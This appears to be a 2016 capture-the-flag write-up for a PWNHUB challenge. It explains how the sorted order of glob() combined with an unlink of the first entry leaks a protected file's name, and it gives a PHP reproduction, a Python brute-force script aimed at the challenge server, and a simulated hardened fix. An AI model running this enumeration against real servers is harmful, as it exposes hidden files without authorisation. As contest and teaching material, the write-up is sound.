PWNHUB: Another File

pwnhub___writeup

Challenge
http://54.223.145.113:88/

Where on earth is the file? And where did my file go?

The flag is a file; no shell is needed, and rumour has it the mysterious person who placed the file has the highest privileges on the server.

The code given in the hint is:

@move_uploaded_file($_FILES['file']['tmp_name'], $dir.$name);
echo "上传成功!\n\n文件内容:\n\n";
echo file_get_contents($dir.$name);
$files = glob($dir . '*'); 
@unlink($files[0]);

Local test code:

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
<form action="" method="POST" enctype="multipart/form-data">
    <input type="file" value="" name="uploaded">
    <input type="text" value="1" name="Upload">
    <input type="submit" value="submit" name="submit">
</form>
</body>
</html>
<?php
// Local reproduction of the hint: store the upload, print it back,
// then unlink whatever glob() lists first in the upload directory.
$html = "";
if( isset( $_POST[ 'Upload' ] ) ) {
    $target_path  = "upload/";
    $target_path .= $_FILES[ 'uploaded' ][ 'name' ];
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        $html .= "<pre>successfully uploaded!</pre>";
        echo file_get_contents($target_path);
        $dir = "upload/";
        $files = glob($dir . '*');   // sorted listing, same as the hint code
        var_dump($files);
        @unlink($files[0]);          // silently fails on an immutable file
        var_dump($_FILES);
    }
}
echo $html;
?>

Make the flag file undeletable:

chattr +i w333lc0met00pwnhu66

The key point is this:

$files = glob($dir . '*'); 
@unlink($files[0]);

glob returns the directory entries in sorted order. If a (protected) file already sits in the directory, whether our upload survives the unlink of `$files[0]` tells us whether its name sorts before or after that file's name, so the name can be guessed one character at a time with boolean-blind-injection-style reasoning.

Python code:

import requests

url = "http://54.223.145.113:88/upload.php"
uploadurl = "http://54.223.145.113:88/upload/"

alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
prefix = "w333lc0met00pwnhu"   # characters recovered so far

for i in alphabet:
    filename = prefix + i
    print(filename)
    with open('./1.txt', 'rb') as f:
        res = requests.post(url=url, files={'file': (filename + ".txt", f)})  # proxies={"http": "http://127.0.0.1:8080"}
    # print(res.content)
    # The upload survives only if it sorts after the flag file, so the first
    # surviving character is one past the flag's next character (a survivor at
    # '0' means the flag name has no further character).
    if requests.get(url=uploadurl + filename + ".txt").status_code == 200:
        results = prefix + alphabet[alphabet.index(i) - 1]
        print("flag依次为: " + results)
        break
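As an added example (not the write-up's own code), here is an in-memory simulation of the handler's sorted-glob/unlink behaviour next to a hardened handler that deletes only what it created, plus the character-by-character recovery generalised to the whole name: the "." and "~" probe suffixes are chosen so the oracle answers "is this character the flag's next one" directly, without the off-by-one of the ".txt" probes above. The flag file name is the one from the chattr line; the `UploadDir` class and the suffixes are assumptions of this example.

```python
import string

ALPHABET = string.digits + string.ascii_lowercase


class UploadDir:
    """In-memory stand-in for the upload directory; `immutable` models chattr +i."""

    def __init__(self, flag_name):
        self.files = {flag_name}           # constructed: the flag file is already there
        self.immutable = {flag_name}

    def vulnerable(self, name):
        """Mirror of the hint code: store the upload, then @unlink the first glob() entry."""
        self.files.add(name)
        first = sorted(self.files)[0]      # glob() hands back names in sorted order
        if first not in self.immutable:    # @unlink() fails silently on the +i file
            self.files.discard(first)
        return name in self.files          # True <=> GET /upload/<name> would give 200

    def hardened(self, name):
        """Fix: remove only the file this request created, never a glob() pick."""
        self.files.add(name)
        self.files.discard(name)
        return name in self.files


def recover_name(oracle, prefix=""):
    """Rebuild an alphanumeric file name from the survived/deleted oracle.
    oracle(name) is True when the probe survived, i.e. it sorted after the flag.
    Byte order gives '.' < '0'..'9' < 'a'..'z' < '~', which the suffixes rely on."""
    while True:
        # No alphanumeric name sorts between prefix and prefix+".", so this probe
        # survives only when the flag name is exactly the prefix: we are done.
        if oracle(prefix + "."):
            return prefix
        for c in ALPHABET:
            # '~' sorts last, so prefix+c+"~" survives iff c >= the flag's next char;
            # the first survivor is therefore that character itself.
            if oracle(prefix + c + "~"):
                prefix += c
                break
        else:
            return None                    # nothing ever survived: no leak here


if __name__ == "__main__":
    print(recover_name(UploadDir("w333lc0met00pwnhu66").vulnerable))  # the flag name
    print(recover_name(UploadDir("w333lc0met00pwnhu66").hardened))    # None
```

Surviving probes stay in the simulated directory just as they would on the server; they all sort after the flag, so they never become the first glob() entry and do not disturb the oracle.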
posted @ 2016-12-10 16:21  C1AY  views (155)  comments (0)